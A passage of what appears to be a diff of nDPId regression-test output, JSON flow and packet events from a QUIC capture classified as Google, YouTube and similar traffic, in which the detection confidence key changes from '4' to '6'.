xaGwTFwQbItBr0May5hHbw7VijZr\/F9HknAkXN+WQzfw2IZkbx63CHzTxn0Lf0\/gAteNoZtUoQnGHEWYD7yIoAOl+XtxktZ2WH8ilBnJI532y+PhOHWg7vFNIZYy2XNI7Ro8rUoGLA7ZyBrhYAPGV\/NOjp8U6D1metWriDzDxh0ozJasZzk0JYSqpovUTh5xgdlDtecRDUNdlTAfjBnyMbf+cFYTPnowHg7\/FY4RR3Q6\/UygV+NcMVkjaTNaDNXvagiuVZXLNIb4Tk3A2V3EqgUkxJl3ru+va\/80OsxasM4dazYUBuVN1MBNdZhpkRBKIit9QjLPAJB6wcXxf+0p+d0gN55St3hQi8gb\/iL9k\/onbQhxFP89onbtuDFXRyUSTM8tQq5CBj7L4VyNmcLHxtw5p3RXU70Uk+0psZnI2HJXq3ccqQUlNOGe4V57sFTrkyJUpugmAdJl2lStMmlzn5NM6S8FjEz0Mv23EdQvL2Xv8xQtAJ82kaQeAQu+skCfiHwl2eE0HR0kpuVdYzC4577xLkjxLKoUO64A52BAN
zmrvYZyO1d0UbSchYHinUiE32BfXi+lFE2EkQL8c4oFSQkavwjhteXk5z9herUfnERT404lCm6CiO4Z5gG+k6w2kpWoipnHtRYOjO897tsBk6rLYOHvEuLqjnZuhXbn3m7joNX5Nd\/3Q65iq8R5w3zlVfzVIw6SZdhLY9l5ctDa9JFYiC9MK\/ietRcrprlPxUIwhQEDdSRUda3EJD\/9M9hmP+CaD+tbS38jpu\/LbnTrforILNg1cv1A+sXeT03E966mAsy1Ec1mrv8LqFR9Ep7nyOUg5\/wWMujj7+qgzOoMXZ"} -00925{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433067996,"flow_last_seen":1621433067996,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433067996,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"87.179.155.149","src_port":49689,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.com","user_agent":"dev Chrome\/92.0.4503.0 Android 10; SM-A125F","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} -00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":56,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432876694,"flow_last_seen":1621432876694,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433067996,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"251.236.18.198","src_port":59048,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 
+00925{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433067996,"flow_last_seen":1621433067996,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433067996,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"87.179.155.149","src_port":49689,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.com","user_agent":"dev Chrome\/92.0.4503.0 Android 10; SM-A125F","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":56,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432876694,"flow_last_seen":1621432876694,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433067996,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"251.236.18.198","src_port":59048,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 
00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433096272,"flow_last_seen":1621433096272,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433096272,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":62818,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02317{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1621433096272,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621433096272,"pkt":"AAAAAAAAAAEAWIVLCABFAAVi+xxAAH4RF+uokEAFcfqJ8\/ViAbsFTmV5zf8AAB0InVNfXfhBloQANwAYYxPxefYKsSfYBnNv1ogsVtvxp+5D0ZV\/hOY9nIpSROAI1ZGm2\/N1AX52ghSODygwpwixzphE\/Zx4PU\/J05Jihihf0HSLIm8bvq1I4lsCPEN84oOzz93N2RNW4AsTQ126TJRbLg+\/OXaDSNcEv\/431bFF8tgqRZ\/fSgX8JysNc3KPA0qWL2Lk3BVQJPsXIJEu279PpzYHBZ9j8jr+MI6zCBxYsOIqbCcGrJg7V4pGpqZanmc\/ej\/n3DeFkX7FR0rIL4URy2ACi55eZKyE\/cY\/+hGES0KNpvEuqZP0W6JB1GsnUf4nno1645JeNNQ40sWdwbJM93i20DxzCA2IHAqqDjKl7kwPdqZgyd9wwmr9W5oFXYYoiVP9fx50w\/y3HwF4y+xHmrmGKykORvvBujXyroRnjwvJp9k2q78bX9Nyvlbb\/fcJY8pdAcKGU9z25xdLJSOP1tG+gXR\/jGu2H6rUhavGMF5LYRTLRLHp4SbpUUx8jxdCEFUjmqtpUIEIrwm4Z0Hm+uQms\/iJ5w+1UJ2sdLBPKH3CMuMfmQi9NKErYIIwBEWNGQPZhSqFzVRVxsUINfKxs3IjvTnnhraOla+6OE4l1QrgjctRAPGA7S62BByhCMQNGtxvd0byLHL3+HLvfrJ4IQWU+re9yL28JxErUWHasznlYJkI6xctz4\/QfwLD\/upI1HHH3su\/JN\/59+8xaxpgdcd1l2nQp0pyvwyv5U6Wf7RnFfTWkvsE+beNCGvmyezggTvYYVlP3svh2dMR5YCsXGGBkHXD5Al\/bACbEjho74CZPIoyoqlumxFrHIJzc\/NBVqNAjx6GAMbtTyTT
9DzAEk0LjnqNCPGHCefcqhja9+\/J1dYX96nmT25GaBsEaG\/rC+3NobsSNBEJakiA8NJIkUAtNh+7e+Q1zXrNjmd8NmSHehchWFhaFYfxnUhrfl0EpT63dRGyufStUHX8IH1M1xkDQCR7MdusL0d8DxstPAiU60cVG6Pwo2zDUTo5ubMxGhOpDHV7R7afYETZMCRo7m4ZNNCrUpt7zoBwup1J4svPg6nbVaI\/m0yq18JHw6AXXYyRID8HHMYm7BT25H0nPZW9IjpdJr3qmbDzc+C1RUeG2FZX3vtkbX1cww+TdfceaPdnmlb8oqte+bT7ih1pGpJbAr5QrtlJ0fJxJALGxPwvaxQt9OZJtzlgIiab41SJVcAVCq2GsiZ42wdCT81IxlQVTSKbH4rfxWIpBOQ2K2fcx5t+Zp\/ZWzBzNSCJHZYT0Yrw\/F\/i5MpM8YmdTShwy7McxVy34xfaZsuGyshTN0NhE1oUwb89fh0YTKyYiGlurNDOZOnGgfEY3re1o6jZ1GhwQ9qS8pljPV8ic6OmyGN3uNl6cnbAJr6m2SeP9AyqqSk1xq6k+NfhHQoeQ0khsYt2zSVuVeE30pVDMVLVpm1OQ7GuqKpKfrgPTEqSQp7+KiYJBgE45ORKunQOL\/cPFO2l8yzljsHT\/3TEL5kTELmyqZtHoUk5kaVnTC2KnmjMSJdqOCe0YoI+ZYBNkv2Qc1l\/Ve5vnSTtpVXPgZSSESjNxCDjPN5u2\/Z4VbQPVJvn\/cvLnv37v4aofPgYXBuu4ppOjhOv+b1CVIy9SClF\/HoAy6eQYGuQjl4dTmHCm2hwqRIzd1UwyH0AmPA5vcXUv8JLzDIYLi6t8TV9fYAP5GDkBiAsP8JBZRXqxfCVEsg4I5l0rc9K50VAdnoSCYqi+WwH8w7xNF4Bf7\/E3sWph1xGreEe2sTWhSoHxGuzKZgP"} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433096272,"flow_last_seen":1621433096272,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433096272,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":62818,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"clientservices.googleapis.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 
-00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432905490,"flow_last_seen":1621432905490,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433096272,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"170.196.90.126","src_port":45652,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} -00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432905483,"flow_last_seen":1621432905483,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433096272,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"93.100.151.221","src_port":38331,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.DataSaver","breed":"Fun","category":"Web"}} 
-00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432907578,"flow_last_seen":1621432907578,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433096272,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"98.251.203.81","src_port":43427,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} +00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433096272,"flow_last_seen":1621433096272,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433096272,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":62818,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"clientservices.googleapis.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 
+00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432905490,"flow_last_seen":1621432905490,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433096272,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"170.196.90.126","src_port":45652,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} +00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432905483,"flow_last_seen":1621432905483,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433096272,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"93.100.151.221","src_port":38331,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.DataSaver","breed":"Fun","category":"Web"}} 
+00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432907578,"flow_last_seen":1621432907578,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433096272,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"98.251.203.81","src_port":43427,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433110371,"flow_last_seen":1621433110371,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433110371,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"125.136.204.4","src_port":56425,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02309{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1621433110371,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621433110371,"pkt":"AAAAAAAAAAEAdQOrCABFAAViTQVAAH4ReGOokEAFfYjMBNxpAbsFTiPgxP8AAB0I64b6Iq3qYnUAAEU0uyXOGSdM2M9jQQTW8DsUXfqiyZuXJRO+q4Qmsi3Ls5Qr7HY2TrDXBUTOIVmmAHBRjS4fP4\/iytOosBigAE3GS1YbHzV4KTpsNSP39e4Ai\/gNwa+JW6iG+pMEbrvqFzobrQPLaW\/LHhGgdXr9HPIyoZkTeqm4dAslx2tKgtIx+D3ADPfxa1GtgUwgxIFKeLXE5L28gvidFJ5kvOUtEWVi7p1Ct04FJCqOfcTDqWyHNK+CqUqUXBJaar8gIYJl7Adtmv4APrH1W4DdFGHseDk\/eiFm5dmfQmCqHSHBPKfjlASsF\/vx\/dDIlMGRNJVvEUORDhpGyc6KzrwpCkBycpnvcDHT9PXlK1Pxbvka1u8Bb\/RRdl4GhJjum02FvwJAQzMMcjvQQIBXXUnCtqFNSpD+x2LT6UXB+SZ7qVGMl\/t0sECBNEK08pUkCk0VFUho606M2fHuj9LbnZQ2bGNrvbAjmEkMviJQv1BoTAZGNESQTqDEbwUZYlY30qwlBFXqT9WdH2E9DjbH42c0gLLqSkQErQpcDnv3SSVrUT94EWqqkCfDVWO57NKjDmHa\/9gsGDeQQUO53mruFkMe6rXxUCFdLDVpieBe\/WbmjFIiYjT+b4FzvV0xGUDAY6PtgiB6HvKPqKp6fxy1kpVrc+ZsH0+HKMh3jfC1EeH9CHXsXnCW1rsQpJK4+n8CsldKtQaVDkSAqWG\/OgV+UysKdCujrfyCGHfNMSPWkslqqg7s2vLXqrQBO58gohSxIbtaCIYfWJrle40Mot6V+cL54Ya7PHlWtQH\/Ful4v4rOlvCR9PDd2nGpQ3FkgkGPeywwCdeY5sCTYbMMlVuLQJ1oFmyS3u\/zhwjeifqZs579qwIfpeaP1FtY5r+JU0rDJQFD7jOZdftjZf2LgOsGj\/TW2xmygvRQ30KJn7bLRU1w2J0q7tz5rXSOHzMeKm57vqp3aJSFv9vTNxJ+BD5u\/xLLqLMMeKd3yPZj737pE79\/LtTTjm5eJ8jsSmmJueqzLtGilfbTFryRQF8325++2yfVJKrzj0c61X3njJbMRbXWJEiQmoEZWV9TWfn7wTSpOjjQRnHFofPS0wy5fqr\/79EqOgnhI9PoQuUw+VgWrmM8UnMpt6HX7llwMkswjZvYYBxWiZK7SxCUZWVinS8leBxtyiCVvDCRWP+lpTzYWOppDeOpuuR6nJmZFaaTGLcFFPeAKuAVu+nTC0hkldleZKShVNc+\/+rolf\/Gxsw5EKidbPL8HFlBJjaenmfkmZBH3LxN7+OOgk0dXGhmlJ4wgJ21FhusAxJjb4rdo8Ob65\/i1ZqK2DnqWoWzDwD5m4Uu8\/nBbSMW0kQrvJmBY4XN+lhGiBPJsJk96AxOW048eDZfKJYg8Q4WotwapShO9Tb4n7Q5LhKow3wsQkO4tfue14G\/HUzOIzbT2Vd6GbyzGYbP6zeXYMvI\/MobQkwBtMUX8uK0OxAv1
Dxr6E1ez++cFwnP4qZm\/N5d3Snzx7Qd6PHVVvdaIKFS5ChMsrskm71TFLKy4FJm65hgjBVyTzsB5o+U2Jtrwl04IuRnmQXivp3vavvqqU\/4e3mekp37TSUP7JrzfA2\/tdw5ycfdyqXP74qiJ7FqCBDCIFZz07WOMSykwdBK8sEwapJgncvO5v8s3K9sHSmwHnUhAmcTcEJWDFYrq8fgJAuluMgxicHkbBHDHTdVhPiEDPwopOcYRyFx6QlMlyoiPrV8enJOOqMFw9m6sR5PA1xxKZEflyuJ3mRTH80kEIdfZNby15\/d"} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433110371,"flow_last_seen":1621433110371,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433110371,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"125.136.204.4","src_port":56425,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"r1---sn-vh5ouxa-hjuk.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} -00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":58,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432925103,"flow_last_seen":1621432925103,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433110371,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"171.182.169.23","src_port":54692,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433110371,"flow_last_seen":1621433110371,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433110371,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"125.136.204.4","src_port":56425,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"r1---sn-vh5ouxa-hjuk.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":58,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432925103,"flow_last_seen":1621432925103,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433110371,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"171.182.169.23","src_port":54692,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
00602{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":58,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":58,"packets-processed":57,"total-skipped-flows":0,"total-l4-payload-len":76950,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":45,"total-detection-updates":0,"total-updates":0,"current-active-flows":5,"total-active-flows":45,"total-idle-flows":40,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":193,"global_ts_msec":1621433283660} 00630{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433283660,"flow_last_seen":1621433283660,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433283660,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":59622,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02313{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1621433283660,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621433283660,"pkt":"AAAAAAAAAAEAU0VlCABFAAViM6RAAH4RJaGokEAFmWIcTujmAbsFTq3rwf8AAB0Iz5STt1Y1cC0ANwDFPRNS\/+a+ehucrc3Cy3E4zimx6Se5x9S2Dy\/Gdsrzx5YFrAfk\/P5DuuwrPRCPOU3BXGhgTB5E\/e3sUYmzAEVTAuBYpB\/Z\/1ehiztmkudlkpmIe8TV88KuQZdgMCFwpkxLuaxS1ziTCHLi1IPv4lk79c5Z0ULFtJLLvCInJMRjcd6mMGJScqPLX\/oX54gz8qU\/6Qz4haz6hp+OoT4jjUoHwXKwZdcJIPU1d0Fgj9BSxoZMC3uUZUh6\/nSO1JIplWk20Jn+EdrtXf9IF3Neg2QP7WN48TjKFEWh8rRXUGGVZwXfgyZ4u67st5aDs9WYZrXzKxk1nJVUFJMK02b+yKanwM95M5gyBaP7fEbsz3G93Jc14HIS+TZPmXtQf0GDj7Mvht+3zbNTk\/o4VaawVm8AXrpyWNWavSleSlFtm32amXDcWcXBAXyviKq\/ZxOJHsOe0hRNn8R9DKEAdOiVzWHc7gKLyh2t\/TJ5RZvARNmvpppZ6wGihiLhcw7ZfxEeTZuIMl2vCqdlmdPL9rAcodDnH3cPQgNcH7hxThB++pzk4xpGMH6II4XWKGZRVIss+xX363+BpzZ84mO8AvFYpM2G1yOSewM2tyHJJjvt5tVaanjhIHX91fgLX\/FiKYxmMGxgXGOHydnptpnm23dOt0b9WZvjKRdNovSQvIwMupd1UWFxikqzvsb7A4rsAUyXLWIzvzBBk7394MKzqD+owlnrzPcWgMnz22akkOeqa\/r7Uc1zdnb\/xMYpRLj6j\/VJPcZxgWSF\/P4Qtjjh5xSMS7E0SpcbJG3qGTIvbs9UGrdVGQOvITRNq5BHB25231B8uXSwZZ2OfP4kX6XjlMWXbP+uJQMmZTGglRloO+dA6aqTrTy9krXaEQKMk1DpabL8dpFus+hC79SbtQRB2+q+kl1BPR+TLeqOsYPTKcukPf2WREttP39G\/t9VQQCU\/rrFLKNTWUuaicuTglon\/iwyuggUyLgAJ5TOQSh3AwDysJj81Jj8yy\/XVRc+Ow92NtvThIEXi2BqpMI0pLfvsZgTdjiOUTaj4nR5+SLJt0aFTQqUXp4O4\/J8uybiTqPwgzFfEz23lP4SecnmMrwFjOkjPHhXc3\/7rEUmZh2scM1CaQnd8xqX1Byg\/aXBz51V4uicTZLxtfg75bBVl3kelSzZJu+XqjxdL+n9CzfZbtFpXbsW2S+Q4+jDNeJp4HBqG06R4FxxFevo8pd0keFBmX69U1z3Wq3sokxVvxe8+dpn6prJlOSracYX8yZoELER11iW2n6aiIPlofm1lWs6hUzVqnPotYA\/DykZqsMhurgWD4MoqHtW4DHKc5Bn5KWc\/OJK60z5e9EaP9fvLRfYouPq78UI388ELbk719D+pp1WijPL3R0TEvj7ae26qCBSAEds62fCV+P4XZ5x0eUy1+pBImuibzJy0Qqd7jHkHbgRa8FGmj\/X2+xPfVMG8h0AO
